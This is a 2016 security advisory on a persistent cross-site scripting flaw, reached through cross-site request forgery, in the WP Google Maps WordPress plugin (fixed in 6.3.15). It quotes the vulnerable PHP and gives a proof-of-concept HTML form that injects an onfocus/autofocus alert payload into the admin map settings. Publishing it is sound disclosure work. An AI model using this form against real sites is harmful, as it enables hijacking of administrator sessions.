------------------------------------------------------------------------ Persistent Cross-Site Scripting in WP Google Maps Plugin via CSRF ------------------------------------------------------------------------ Sipke Mellema, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A persistent Cross-Site Scripting vulnerability was found in the WP Google Maps Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0007 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WP Google Maps WordPress Plugin version 6.3.14. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in WP Google Maps WordPress Plugin version 6.3.15. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_google_maps_plugin_via_csrf.html The issue exists in the file wpGoogleMaps.php and is caused by the lack of output encoding on the wpgmza_store_locator_query_string request parameter. The parameter is sanitized with sanitize_text_field, which will encode characters for usage in HTML context. However, the parameter is used in JavaScript context, allowing for Cross-Site Scripting. The vulnerable code is listed below. $other_settings['store_locator_query_string'] = sanitize_text_field($_POST['wpgmza_store_locator_query_string']); if (isset($_POST['wpgmza_store_locator_restrict'])) { $other_settings['wpgmza_store_locator_restrict'] = sanitize_text_field($_POST['wpgmza_store_locator_restrict']); } [..] if (isset($map_other_settings['wpgmza_store_locator_restrict'])) { $restrict_search = $map_other_settings['wpgmza_store_locator_restrict']; } else { $restrict_search = false; } [..] { types: ['geocode'], componentRestrictions: {country: '<?php echo $restrict_search; ?>'} }); Proof of Concept Have an authenticated admin visit a webpage with the following form: <html> <body> <form action="http://<wordpress site>/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1" method="POST"> <input type="hidden" name="wpgmza&#95;id" value="1" /> <input type="hidden" name="wpgmza&#95;start&#95;location" value="45&#46;950464398418106&#44;&#45;109&#46;81550500000003" /> <input type="hidden" name="wpgmza&#95;start&#95;zoom" value="2" /> <input type="hidden" name="wpgmza&#95;title" value="My&#32;first&#32;map" /> <input type="hidden" name="wpgmza&#95;width" value="100" /> <input type="hidden" name="wpgmza&#95;map&#95;width&#95;type" value="&#37;" /> <input type="hidden" name="wpgmza&#95;height" value="400" /> <input type="hidden" name="wpgmza&#95;map&#95;height&#95;type" value="px" /> <input type="hidden" name="wpgmza&#95;map&#95;align" value="1" /> <input type="hidden" name="wpgmza&#95;map&#95;type" value="1" /> <input type="hidden" name="wpgmza&#95;theme&#95;data&#95;0" value="" /> <input type="hidden" name="wpgmza&#95;store&#95;locator&#95;restrict" value="ad" /> <input type="hidden" name="wpgmza&#95;store&#95;locator&#95;query&#95;string" value="&#58;i8gr4&quot;onfocus&#61;&quot;alert&#40;1&#41;&quot;autofocus&#61;&quot;" /> <input type="hidden" name="wpgmza&#95;store&#95;locator&#95;bounce" value="on" /> <input type="hidden" name="wpgmza&#95;max&#95;zoom" value="1" /> <input type="hidden" name="wpgmza&#95;savemap" value="Save&#32;Map&#32;i?1/2&#187;" /> <input type="hidden" name="wpgmza&#95;edit&#95;id" value="" /> <input type="hidden" name="wpgmza&#95;animation" value="0" /> <input type="hidden" name="wpgmza&#95;infoopen" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> When the form is submitted (or auto-submitted), a popup box will appear, which means that the JavaScript from the parameter wpgmza_store_locator_query_string is executed in the admin's browser. The JavaScript will run every time the map (with id 1 in this case) is viewed/edited by an admin. ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.